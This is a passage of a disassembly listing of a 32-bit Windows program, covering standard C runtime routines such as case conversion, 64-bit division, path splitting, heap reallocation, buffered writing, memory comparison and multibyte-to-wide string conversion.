loc_41721E: ; CODE XREF: sub_417183+1A�j
; sub_417183+32�j
pop ebx
leave
retn
sub_417183 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417221 proc near ; CODE XREF: sub_408F97+6�p
; sub_408FB5+4A�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4C911C, 0
push ebx
push esi
push edi
jnz short loc_41724E
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4172E7
cmp eax, 5Ah
jg loc_4172E7
add eax, 20h
jmp loc_4172E7
; ---------------------------------------------------------------------------
loc_41724E: ; CODE XREF: sub_417221+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_417282
cmp ds:dword_42F56C, esi
jle short loc_417270
push esi
push ebx
call sub_418762
pop ecx
pop ecx
jmp short loc_41727A
; ---------------------------------------------------------------------------
loc_417270: ; CODE XREF: sub_417221+42�j
mov eax, ds:off_42F360
mov al, [eax+ebx*2]
and eax, esi
loc_41727A: ; CODE XREF: sub_417221+4D�j
test eax, eax
jnz short loc_417282
loc_41727E: ; CODE XREF: sub_417221+AD�j
mov eax, ebx
jmp short loc_4172E7
; ---------------------------------------------------------------------------
loc_417282: ; CODE XREF: sub_417221+3A�j
; sub_417221+5B�j
mov edx, ds:off_42F360
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4172A6
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_4172AF
; ---------------------------------------------------------------------------
loc_4172A6: ; CODE XREF: sub_417221+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_4172AF: ; CODE XREF: sub_417221+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push ds:dword_4C911C
call sub_41C829
add esp, 20h
test eax, eax
jz short loc_41727E
cmp eax, esi
jnz short loc_4172DA
movzx eax, [ebp+var_4]
jmp short loc_4172E7
; ---------------------------------------------------------------------------
loc_4172DA: ; CODE XREF: sub_417221+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4172E7: ; CODE XREF: sub_417221+16�j
; sub_417221+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_417221 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4172F0 proc near ; CODE XREF: sub_409E68+3D�p
; sub_40B62E+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_417311
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_417361
; ---------------------------------------------------------------------------
loc_417311: ; CODE XREF: sub_4172F0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41731F: ; CODE XREF: sub_4172F0+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41731F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41734A
cmp edx, [esp+4+arg_4]
ja short loc_41734A
jb short loc_417352
cmp eax, [esp+4+arg_0]
jbe short loc_417352
loc_41734A: ; CODE XREF: sub_4172F0+4A�j
; sub_4172F0+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_417352: ; CODE XREF: sub_4172F0+52�j
; sub_4172F0+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_417361: ; CODE XREF: sub_4172F0+1F�j
pop ebx
retn 10h
sub_4172F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417370 proc near ; CODE XREF: sub_409E68+24�p
; sub_40B62E+3F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_417392
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4173D3
; ---------------------------------------------------------------------------
loc_417392: ; CODE XREF: sub_417370+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_4173A0: ; CODE XREF: sub_417370+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4173A0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4173CE
cmp edx, [esp+8+arg_4]
ja short loc_4173CE
jb short loc_4173CF
cmp eax, [esp+8+arg_0]
jbe short loc_4173CF
loc_4173CE: ; CODE XREF: sub_417370+4E�j
; sub_417370+54�j
dec esi
loc_4173CF: ; CODE XREF: sub_417370+56�j
; sub_417370+5C�j
xor edx, edx
mov eax, esi
loc_4173D3: ; CODE XREF: sub_417370+20�j
pop esi
pop ebx
retn 10h
sub_417370 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4173D8 proc near ; CODE XREF: sub_409F1E+1E3�p
; sub_40CB17+F7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_415C80
cmp eax, 1
pop ecx
jb short loc_417413
cmp byte ptr [ebx+1], 3Ah
jnz short loc_417413
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_41740F
push 2
push ebx
push esi
call sub_41CE2D
add esp, 0Ch
and byte ptr [esi+2], 0
loc_41740F: ; CODE XREF: sub_4173D8+25�j
inc ebx
inc ebx
jmp short loc_41741D
; ---------------------------------------------------------------------------
loc_417413: ; CODE XREF: sub_4173D8+18�j
; sub_4173D8+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41741D
and byte ptr [eax], 0
loc_41741D: ; CODE XREF: sub_4173D8+39�j
; sub_4173D8+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_417495
loc_417430: ; CODE XREF: sub_4173D8+87�j
mov cl, [eax]
movzx edx, cl
test ds:byte_4CA5E1[edx], 4
jz short loc_417441
inc eax
jmp short loc_41745B
; ---------------------------------------------------------------------------
loc_417441: ; CODE XREF: sub_4173D8+64�j
cmp cl, 2Fh
jz short loc_417455
cmp cl, 5Ch
jz short loc_417455
cmp cl, 2Eh
jnz short loc_41745B
mov [ebp+var_4], eax
jmp short loc_41745B
; ---------------------------------------------------------------------------
loc_417455: ; CODE XREF: sub_4173D8+6C�j
; sub_4173D8+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_41745B: ; CODE XREF: sub_4173D8+67�j
; sub_4173D8+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_417430
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_417495
cmp [ebp+arg_8], 0
jz short loc_417490
sub edi, ebx
cmp edi, esi
jb short loc_417479
mov edi, esi
loc_417479: ; CODE XREF: sub_4173D8+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_41CE2D
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_417490: ; CODE XREF: sub_4173D8+97�j
mov ebx, [ebp+arg_4]
jmp short loc_41749F
; ---------------------------------------------------------------------------
loc_417495: ; CODE XREF: sub_4173D8+56�j
; sub_4173D8+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_41749F
and byte ptr [ecx], 0
loc_41749F: ; CODE XREF: sub_4173D8+BB�j
; sub_4173D8+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_4174F2
cmp edi, ebx
jb short loc_4174F2
cmp [ebp+arg_C], 0
jz short loc_4174CF
sub edi, ebx
cmp edi, esi
jb short loc_4174B8
mov edi, esi
loc_4174B8: ; CODE XREF: sub_4173D8+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_41CE2D
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4174CF: ; CODE XREF: sub_4173D8+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_41751A
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_4174DF
mov esi, eax
loc_4174DF: ; CODE XREF: sub_4173D8+103�j
push esi
push [ebp+var_4]
push edi
call sub_41CE2D
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_41751A
; ---------------------------------------------------------------------------
loc_4174F2: ; CODE XREF: sub_4173D8+CC�j
; sub_4173D8+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_417510
sub eax, ebx
cmp eax, esi
jnb short loc_417501
mov esi, eax
loc_417501: ; CODE XREF: sub_4173D8+125�j
push esi
push ebx
push edi
call sub_41CE2D
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_417510: ; CODE XREF: sub_4173D8+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_41751A
and byte ptr [eax], 0
loc_41751A: ; CODE XREF: sub_4173D8+FC�j
; sub_4173D8+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4173D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41751F proc near ; CODE XREF: sub_40A627+19�p
; sub_40BAA1+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_417F58
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41755D
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41756A
; ---------------------------------------------------------------------------
loc_41755D: ; CODE XREF: sub_41751F+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_417E43
pop ecx
pop ecx
loc_41756A: ; CODE XREF: sub_41751F+3C�j
mov eax, esi
pop esi
leave
retn
sub_41751F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41756F proc near ; CODE XREF: sub_40A86D+2E�p
; sub_4167B3+35�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jnz short loc_41758A
push [ebp+arg_4]
call sub_415D2F
pop ecx
jmp loc_41780A
; ---------------------------------------------------------------------------
loc_41758A: ; CODE XREF: sub_41756F+B�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_41759F
push [ebp+arg_0]
call sub_415DE1
pop ecx
jmp loc_417808
; ---------------------------------------------------------------------------
loc_41759F: ; CODE XREF: sub_41756F+20�j
mov eax, ds:dword_4CA708
cmp eax, 3
jnz loc_4176AF
loc_4175AD: ; CODE XREF: sub_41756F+12E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41768B
push [ebp+arg_0]
call sub_418EA9
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_417666
cmp esi, ds:dword_4CA700
ja short loc_41761F
mov edi, [ebp+arg_0]
push esi
push edi
push ebx
call sub_4196B2
add esp, 0Ch
test eax, eax
jnz short loc_41761B
push esi
call sub_4191FD
mov edi, eax
pop ecx
test edi, edi
jz short loc_41761F
mov ebx, [ebp+arg_0]
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_4175FF
mov eax, esi
loc_4175FF: ; CODE XREF: sub_41756F+8C�j
push eax
push ebx
push edi
call sub_415560
push ebx
call sub_418EA9
push [ebp+arg_0]
mov ebx, eax
push ebx
call sub_418ED4
add esp, 18h
loc_41761B: ; CODE XREF: sub_41756F+74�j
test edi, edi
jnz short loc_417662
loc_41761F: ; CODE XREF: sub_41756F+62�j
; sub_41756F+81�j
test esi, esi
jnz short loc_417626
push 1
pop esi
loc_417626: ; CODE XREF: sub_41756F+B2�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push ds:dword_4CA704
call ds:dword_4220C8 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_417662
mov ecx, [ebp+arg_0]
mov eax, [ecx-4]
dec eax
cmp eax, esi
jb short loc_41764E
mov eax, esi
loc_41764E: ; CODE XREF: sub_41756F+DB�j
push eax
push ecx
push edi
call sub_415560
push [ebp+arg_0]
push ebx
call sub_418ED4
add esp, 14h
loc_417662: ; CODE XREF: sub_41756F+AE�j
; sub_41756F+D0�j
test ebx, ebx
jnz short loc_417687
loc_417666: ; CODE XREF: sub_41756F+56�j
test esi, esi
jnz short loc_41766D
push 1
pop esi
loc_41766D: ; CODE XREF: sub_41756F+F9�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push ds:dword_4CA704
call ds:dword_42217C ; RtlReAllocateHeap
mov edi, eax
loc_417687: ; CODE XREF: sub_41756F+F5�j
test edi, edi
jnz short loc_4176A8
loc_41768B: ; CODE XREF: sub_41756F+43�j
cmp ds:dword_4C90E4, 0
jz short loc_4176A8
push esi
call sub_418C74
test eax, eax
pop ecx
jnz loc_4175AD
jmp loc_417808
; ---------------------------------------------------------------------------
loc_4176A8: ; CODE XREF: sub_41756F+11A�j
; sub_41756F+123�j ...
mov eax, edi
jmp loc_41780A
; ---------------------------------------------------------------------------
loc_4176AF: ; CODE XREF: sub_41756F+38�j
cmp eax, 2
jnz loc_4177CA
cmp esi, 0FFFFFFE0h
ja short loc_4176CC
test esi, esi
jbe short loc_4176C9
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_4176CC
; ---------------------------------------------------------------------------
loc_4176C9: ; CODE XREF: sub_41756F+150�j
push 10h
pop esi
loc_4176CC: ; CODE XREF: sub_41756F+14C�j
; sub_41756F+158�j ...
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_4177AC
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_419C04
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jz loc_417790
cmp esi, ds:dword_4315A4
jnb short loc_417754
mov edi, esi
shr edi, 4
push edi
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_419FCC
add esp, 10h
test eax, eax
jz short loc_41771A
mov edi, [ebp+arg_0]
jmp short loc_41774C
; ---------------------------------------------------------------------------
loc_41771A: ; CODE XREF: sub_41756F+1A4�j
push edi
call sub_419CA0
mov edi, eax
pop ecx
test edi, edi
jz short loc_417754
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_417733
mov eax, esi
loc_417733: ; CODE XREF: sub_41756F+1C0�j
push eax
push [ebp+arg_0]
push edi
call sub_415560
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_419C5B
add esp, 18h
loc_41774C: ; CODE XREF: sub_41756F+1A9�j
test edi, edi
jnz loc_4176A8
loc_417754: ; CODE XREF: sub_41756F+18B�j
; sub_41756F+1B6�j
push esi
push 0
push ds:dword_4CA704
call ds:dword_4220C8 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_4177AC
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_417775
mov eax, esi
loc_417775: ; CODE XREF: sub_41756F+202�j
push eax
push [ebp+arg_0]
push edi
call sub_415560
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_419C5B
add esp, 18h
jmp short loc_4177A4
; ---------------------------------------------------------------------------
loc_417790: ; CODE XREF: sub_41756F+17F�j
push esi
push [ebp+arg_0]
push 0
push ds:dword_4CA704
call ds:dword_42217C ; RtlReAllocateHeap
mov edi, eax
loc_4177A4: ; CODE XREF: sub_41756F+21F�j
test edi, edi
jnz loc_4176A8
loc_4177AC: ; CODE XREF: sub_41756F+162�j
; sub_41756F+1F8�j
cmp ds:dword_4C90E4, 0
jz loc_4176A8
push esi
call sub_418C74
test eax, eax
pop ecx
jnz loc_4176CC
jmp short loc_417808
; ---------------------------------------------------------------------------
loc_4177CA: ; CODE XREF: sub_41756F+143�j
; sub_41756F+297�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_4177F4
test esi, esi
jnz short loc_4177D8
push 1
pop esi
loc_4177D8: ; CODE XREF: sub_41756F+264�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push ds:dword_4CA704
call ds:dword_42217C ; RtlReAllocateHeap
test eax, eax
jnz short loc_41780A
loc_4177F4: ; CODE XREF: sub_41756F+260�j
cmp ds:dword_4C90E4, 0
jz short loc_41780A
push esi
call sub_418C74
test eax, eax
pop ecx
jnz short loc_4177CA
loc_417808: ; CODE XREF: sub_41756F+2B�j
; sub_41756F+134�j ...
xor eax, eax
loc_41780A: ; CODE XREF: sub_41756F+16�j
; sub_41756F+13B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41756F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41780F proc near ; CODE XREF: sub_40AEC8+127�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
test edi, edi
mov [ebp+arg_0], eax
mov ebx, edi
jnz short loc_417833
xor eax, eax
jmp loc_417900
; ---------------------------------------------------------------------------
loc_417833: ; CODE XREF: sub_41780F+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_417846
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_41784D
; ---------------------------------------------------------------------------
loc_417846: ; CODE XREF: sub_41780F+2D�j
mov [ebp+arg_C], 1000h
loc_41784D: ; CODE XREF: sub_41780F+35�j
; sub_41780F+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_417881
mov eax, [esi+4]
test eax, eax
jz short loc_417881
cmp ebx, eax
mov edi, ebx
jb short loc_417867
mov edi, eax
loc_417867: ; CODE XREF: sub_41780F+54�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_415560
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_4178C7
; ---------------------------------------------------------------------------
loc_417881: ; CODE XREF: sub_41780F+47�j
; sub_41780F+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_4178CC
test ecx, ecx
jz short loc_417895
push esi
call sub_4188F0
test eax, eax
pop ecx
jnz short loc_41790E
loc_417895: ; CODE XREF: sub_41780F+79�j
cmp [ebp+arg_C], 0
jz short loc_4178A8
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_4178AA
; ---------------------------------------------------------------------------
loc_4178A8: ; CODE XREF: sub_41780F+8A�j
mov edi, ebx
loc_4178AA: ; CODE XREF: sub_41780F+97�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_41CEB7
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_417905
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_417905
loc_4178C7: ; CODE XREF: sub_41780F+70�j
mov edi, [ebp+var_4]
jmp short loc_4178F5
; ---------------------------------------------------------------------------
loc_4178CC: ; CODE XREF: sub_41780F+75�j
mov eax, [ebp+arg_0]
push esi
movsx eax, byte ptr [eax]
push eax
call sub_417E43
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41790E
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_4178F5
mov [ebp+arg_C], 1
loc_4178F5: ; CODE XREF: sub_41780F+BB�j
; sub_41780F+DD�j
test ebx, ebx
jnz loc_41784D
mov eax, [ebp+arg_8]
loc_417900: ; CODE XREF: sub_41780F+1F�j
; sub_41780F+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_417905: ; CODE XREF: sub_41780F+AD�j
; sub_41780F+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_417910
; ---------------------------------------------------------------------------
loc_41790E: ; CODE XREF: sub_41780F+84�j
; sub_41780F+CF�j
mov eax, edi
loc_417910: ; CODE XREF: sub_41780F+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_417900
sub_41780F endp
; =============== S U B R O U T I N E =======================================
sub_417919 proc near ; CODE XREF: sub_40B614+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:off_422080
cmp eax, 0FFFFFFFFh
jnz short loc_417939
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
call sub_41D064
pop ecx
loc_417935: ; CODE XREF: sub_417919+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_417939: ; CODE XREF: sub_417919+D�j
test al, 1
jz short loc_41795A
test [esp+arg_4], 2
jz short loc_41795A
mov ds:dword_4C9084, 0Dh
mov ds:dword_4C9088, 5
jmp short loc_417935
; ---------------------------------------------------------------------------
loc_41795A: ; CODE XREF: sub_417919+22�j
; sub_417919+29�j
xor eax, eax
retn
sub_417919 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417960 proc near ; CODE XREF: sub_40B73E+5F�p
; sub_40B73E+92�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_417981
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_417981: ; CODE XREF: sub_417960+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41799D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41799D: ; CODE XREF: sub_417960+27�j
or eax, eax
jnz short loc_4179B9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_4179FA
; ---------------------------------------------------------------------------
loc_4179B9: ; CODE XREF: sub_417960+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_4179C7: ; CODE XREF: sub_417960+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_4179C7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_4179F5
cmp edx, [esp+0Ch+arg_4]
ja short loc_4179F5
jb short loc_4179F6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_4179F6
loc_4179F5: ; CODE XREF: sub_417960+85�j
; sub_417960+8B�j
dec esi
loc_4179F6: ; CODE XREF: sub_417960+8D�j
; sub_417960+93�j
xor edx, edx
mov eax, esi
loc_4179FA: ; CODE XREF: sub_417960+57�j
dec edi
jnz short loc_417A04
neg edx
neg eax
sbb edx, 0
loc_417A04: ; CODE XREF: sub_417960+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_417960 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+0Ch]
test eax, eax
jz short locret_417A5C
mov edx, [esp+4]
push esi
push edi
mov esi, edx
mov edi, [esp+10h]
or edx, edi
and edx, 3
jz short loc_417A5D
test eax, 1
jz short loc_417A3D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_417A8A
inc esi
inc edi
dec eax
jz short loc_417A5A
loc_417A3D: ; CODE XREF: _0:00417A30�j _0:00417A58�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_417A8A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_417A8A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_417A3D
loc_417A5A: ; CODE XREF: _0:00417A3B�j _0:00417A94�j
pop edi
pop esi
locret_417A5C: ; CODE XREF: _0:00417A16�j
retn
; ---------------------------------------------------------------------------
loc_417A5D: ; CODE XREF: _0:00417A29�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_417A92
repe cmpsd
jz short loc_417A92
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_417A85
cmp ch, dh
jnz short loc_417A85
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_417A85
cmp ch, dh
loc_417A85: ; CODE XREF: _0:00417A73�j _0:00417A77�j ...
mov eax, 0
loc_417A8A: ; CODE XREF: _0:00417A36�j _0:00417A43�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_417A92: ; CODE XREF: _0:00417A65�j _0:00417A69�j
test eax, eax
jz short loc_417A5A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_417A85
dec eax
jz short loc_417AB9
cmp dh, ch
jnz short loc_417A85
dec eax
jz short loc_417AB9
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_417A85
dec eax
loc_417AB9: ; CODE XREF: _0:00417A9F�j _0:00417AA6�j
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_417ABC proc near ; CODE XREF: sub_40CA59+55�p
; sub_4143F6+236�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_417AD3
loc_417AC9: ; CODE XREF: sub_417ABC+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_417AC9
loc_417AD3: ; CODE XREF: sub_417ABC+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_417ABC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417AD9 proc near ; CODE XREF: sub_40CA59+19�p
; sub_40CA59+49�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_417BA6
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_417BD3
cmp ds:dword_4C911C, esi
jnz short loc_417B2A
cmp edi, esi
jbe loc_417BD3
loc_417B09: ; CODE XREF: sub_417AD9+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_417BD3
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_417B09
jmp loc_417BD3
; ---------------------------------------------------------------------------
loc_417B2A: ; CODE XREF: sub_417AD9+26�j
mov ebx, [ebp+arg_4]
mov esi, ds:dword_422134
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push ds:dword_4C912C
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_417BD2
call ds:dword_42206C ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_417B64
loc_417B55: ; CODE XREF: sub_417AD9+CB�j
; sub_417AD9+F7�j
mov ds:dword_4C9084, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_417BD3
; ---------------------------------------------------------------------------
loc_417B64: ; CODE XREF: sub_417AD9+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_417B6C: ; CODE XREF: sub_417AD9+B3�j
mov cl, [eax]
test cl, cl
jz short loc_417B8E
mov edx, ds:off_42F360
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_417B83
inc eax
loc_417B83: ; CODE XREF: sub_417AD9+A7�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_417B6C
loc_417B8E: ; CODE XREF: sub_417AD9+97�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push ds:dword_4C912C
call esi ; MultiByteToWideChar
test eax, eax
